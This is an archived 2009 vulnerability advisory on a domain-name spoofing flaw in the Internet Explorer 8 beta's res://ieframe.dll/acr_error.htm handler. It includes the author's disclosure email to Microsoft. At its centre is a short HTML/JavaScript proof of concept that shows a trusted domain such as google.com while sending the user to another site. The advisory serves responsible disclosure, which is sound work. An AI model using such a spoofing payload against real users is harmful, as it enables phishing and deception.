ie8betarc1-spoof.txt
Posted on 05 March 2009
########################################### IE8 beta RC1 res://ieframe.dll/acr_error.htm Spoff Vendor page: www.microsoft.com Advisore:http://lostmon.blogspot.com/ 2009/03/ie8-beta-rc1-resieframedllacrerrorhtm.html vendor notify:yes exploit available:yes ############################################ Internet explorer 8 has a flaw that allows remote users to spooff the domain name in 'ieframe.dll' wen is set to 'acr_error.htm' in res: uri handler a remote user can compose a Bad link thats shows in domain name for example google.com , but wen click in the link it goes to other site (spooffing) ################# Proof of concept ################# <html> <head> <script type="text/javascript"> function open_win() { window.open("res://ieframe.dll/acr_error.htm# http://www.google.com/,http://Lostmon.blogspot.com","_blank","toolbar=yes, location=no, directories=no, status=no, menubar=yes, scrollbars=no, resizable=no, copyhistory=no"); } </script> </head> <title>..:[-IE8 res://ieframe.dll/acr_error.htm Domain name Spoff -]:..</title> <body> <form> <input type="button" value="Open Window" onclick="open_win()"> </form> </body> </html> ####################################### Thnx To estrella to be my ligth Thnx to all Lostmon Team ---------- Forwarded message ---------- From: Lostmon lords <lostmon@gmail.com> Date: 2009/3/4 Subject: ie8 spooff the domain name in ieframe.dll wen is set to acr_error.htm in res: uri handler To: Microsoft Security Response Center <secure@microsoft.com> Hello Internet explorer 8 has a flaw that allows remote users to spooff the domain name in ieframe.dll wen is set to acr_error.htm in res: uri handler a remote user can compose a malicious link thats shows in domain name for example google.com , but wen click in the link it goes to other site (spooff) res://ieframe.dll/acr_error.htm#[trusted domain],[attackers site] see attached file as a PoC. res://ieframe.dll/acr_error.htm I test it in windows 2003 and winxp pro&home with ie 7 and it does not work it apears that its affects only IE8 Thnx for your time !!!! -- atentamente: Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente.... -- atentamente: Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Google group: http://groups.google.com/group/lostmon (new) -- La curiosidad es lo que hace mover la mente....
